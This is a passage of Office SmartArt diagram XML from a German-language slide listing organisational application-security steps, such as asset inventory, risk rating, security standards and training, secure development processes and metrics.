    <dgm:cxn modelId="{C4009C82-E622-40C8-8FB7-6380EADF7F5F}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{78659FC8-EF8A-4FBC-9D26-AD65094C1910}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{47A36F49-3AAD-4E59-97BA-99E51BBF3B99}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{49752AEC-E0E4-4FEF-8A9F-E042028C8834}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6C78AFF8-1679-4F5F-B102-065B6CCA8228}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F4713172-7C29-4C1A-A457-D30D496E1FCE}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B36C47BA-53DB-4EF7-A970-78ADB80D1059}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4C2ED2F0-1B7C-4DCC-B116-7D560B1E7E56}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{71CD2FBB-8BEB-42D3-B2DA-B91FB800A7DE}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{890A9A6B-6243-48C5-B47B-19F7B3EBDA41}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{50338341-4A1F-4AD1-97C5-45225EB6FD4F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5B413D58-E473-49A9-B978-AED01A0759B4}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A3C00582-1F9D-4CB8-A74C-AFCEA54B5B72}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{561B3097-2F20-4507-956C-45D3EF7F38EA}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7C3DE674-BD19-4B1A-A937-53544C13FCA0}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B0F59AC8-945D-465A-9F96-A59EAEA52758}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{521334F1-F344-4CA6-BF00-E6CB24E7AF91}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{36E684C6-2C87-4BE1-A4CC-2991835F8AEF}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D7A62900-8F1F-405A-BE7E-6FB8C2BF4A35}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{40954B0F-B63B-4CDA-B0AD-EC9BADFF5CA8}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{597E88B9-1516-4A7E-8274-2DA86975884C}"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48012" y="-2161807"/>
          <a:ext cx="113260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de-DE"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Dokumentieren Sie alle Anwendungen und die zugehörigen Datenbestände. Größere Organisationen sollten die Einführung einer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0" err="1">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Configuration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE"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Management Database (CMDB) in Betracht ziehen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="90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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Führen Sie einen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>Anwendungssicherheits-Leitfaden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> ein und fördern Sie dessen Akzeptanz</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t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Führen Sie eine </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>Gap-Analyse der Fähigkeiten Ihrer Organisation zu vergleichbaren Organisationen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>durch, um wichtige Verbesserungsfelder und einen Maßnahmenplan festzulegen</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t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Führen Sie mit Zustimmung der Geschäftsleitung eine </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>Kampagne zur Sensibilisierung für Fragen der Anwendungssicherheit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> für Ihre gesamte IT-Organisation durch</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a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2089829" y="106954"/>
        <a:ext cx="5448974" cy="1022029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="976"/>
          <a:ext cx="94183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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Start</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138683" y="46952"/>
        <a:ext cx="849881" cy="1142031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4235194" y="-818832"/>
          <a:ext cx="1152365"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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Identifizieren Sie den</a:t>
          </a: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Schutzbedarf</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Ihrer</a:t>
          </a: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Anwendungen</a:t>
          </a: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 aus geschäftlicher Sicht. Das sollte zum Teil durch Datenschutzgesetze und andere Vorschriften motiviert sein, die für die zu schützenden Datenbestände</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE"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gelten</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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Erstellen Sie ein </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Risikobewertungsmodell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> mit einem einheitlichen System von Wahrscheinlichkeiten und Auswirkungen, welches die Bereitschaft Ihrer Organisation berücksichtigt, Risiken einzugehen</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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Messen und priorisieren Sie dementsprechend alle Ihre Anwendungen und APIs. Fügen Sie die Ergebnisse in Ihre CMDB ein</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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Legen Sie Prüfu</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE"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ngsrichtlinien fest, um einen angemessenen Abdeckungsgrad und den geforderten Reifegrad festzulegen</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a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2087855" y="1441015"/>
        <a:ext cx="5447044" cy="1039857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="1343951"/>
          <a:ext cx="93889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de-DE" sz="1050" b="1" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Risiko-basierter Ansatz</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="120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38540" y="1389784"/>
        <a:ext cx="847227" cy="1142317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4264473" y="524142"/>
          <a:ext cx="109380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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Erstellen Sie </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>Richtlinien und Standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> für Anwendungssicherheit, die als Basis für alle betroffenen Entwicklungsteams dienen</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a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Definieren Sie einen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>allgemeingültigen Basissatz wiederverwendbarer Sicherheitsmaßnahmen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, die diese Richtlinien und Standards ergänzen und stellen Sie Nutzungshinweise für Design und Entwicklung bereit</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a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Etablieren Sie einen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>Trainings-Plan für Anwendungssicherheit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, das sich an den verschiedenen Entwicklungsaufgaben und Themenkomplexen orientiert</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a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2084995" y="2810410"/>
        <a:ext cx="5452762" cy="987016"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094375" y="2686926"/>
          <a:ext cx="93889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de-DE" sz="1050" b="1" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Sorgen Sie für eine stabile Grundlage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="120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40208" y="2732759"/>
        <a:ext cx="847227" cy="1142317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4348118" y="1866158"/>
          <a:ext cx="92651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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Legen Sie Ihre Aktivitäten bzgl. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>sicherer Implementierung</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>Verifikation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> fest und integrieren Sie diese in existierende Entwicklungs- und Anwendungsprozesse. Diese umfassen die </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Modellierung der Bedrohungen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, sicheres Design und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Design-Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, sichere Programmierung und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>Code-Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>Penetrationstests</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> und Mängelbeseitigung</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a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Stellen Sie Experten und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>unterstützende Dienste bereit, die die Entwickler und die Projektteams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> bei der erfolgreichen Umsetzung unterstützen</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a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2076830" y="4227904"/>
        <a:ext cx="5469094" cy="836059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="4029901"/>
          <a:ext cx="938893" cy="123206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de-DE" sz="1050" b="1" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Integrieren Sie Sicherheit in Ihre bestehen-den Prozesse</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="120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38540" y="4075734"/>
        <a:ext cx="847227" cy="1140399"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4258928" y="3207215"/>
          <a:ext cx="110489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ct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Arbeiten Sie mit Metriken. Treiben Sie Verbesserungs- und Budget-Entscheidungen voran, die auf diesen Metriken und Analysedaten beruhen. Solche Metriken umfassen die Beachtung von Sicherheitspraktiken und -aktivitäten, neue oder entschärfte Sicherheitslücken, erfasste Anwendungen, Fehlerdichte nach Art und Anzahl </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>etc</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a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
